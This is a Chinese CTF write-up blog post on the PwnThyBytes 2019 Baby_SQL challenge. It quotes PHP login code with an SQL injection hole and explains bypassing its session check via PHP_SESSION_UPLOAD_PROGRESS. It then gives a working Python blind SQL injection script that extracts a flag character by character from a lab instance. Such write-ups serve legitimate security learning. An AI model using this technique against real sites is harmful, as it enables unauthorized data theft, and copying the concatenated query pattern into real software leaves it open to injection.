CTF Web安全

[PwnThyBytes 2019]Baby_SQL(session+sql注入)

Posted on 2020-04-08,2 min read

source.zip得到源码。开始审计
在index.php中。对所有输入进行了addslashes转义。
在login.php中

<?php
!isset($_SESSION) AND die("Direct access on this script is not allowed!");
include 'db.php';
$sql = 'SELECT `username`,`password` FROM `ptbctf`.`ptbctf` where `username`="' . $_GET['username'] . '" and password="' . md5($_GET['password']) . '";';
$result = $con->query($sql);
function auth($user)
{
    $_SESSION['username'] = $user;
    return True;
}
($result->num_rows > 0 AND $row = $result->fetch_assoc() AND $con->close() AND auth($row['username']) AND die('<meta http-equiv="refresh" content="0; url=?p=home" />')) OR ($con->close() AND die('Try again!'));
?>

仅仅只是判断是否存在session。
如果我们自己弄个session。那么这边的username就可控。
在学习session反序列化的时候。我们学过。PHP_SESSION_UPLOAD_PROGRESS
OK。就构造一个包含PHP_SESSION_UPLOAD_PROGRESS的POST请求。

import requests
url='http://e3ebe013-7cb3-4006-8d52-3aa8378449ea.node3.buuoj.cn/templates/login.php'
files={"file":"123"}
data={"PHP_SESSION_UPLOAD_PROGRESS":"123"}
cookies={"PHPSESSID":"123"}

for b in range(1,50):
    for i in range(30,130):
        params={"username":'test" or (ascii(substr((select group_concat(secret) from flag_tbl),'+str(b)+',1))='+str(i)+')#',
            "password":"test"}
        a=requests.post(url=url,files=files,data=data,cookies=cookies,params=params).text
        if 'meta' in a:
            print(chr(i))
            break

下一篇: virink_2019_files_share(任意文件读取)→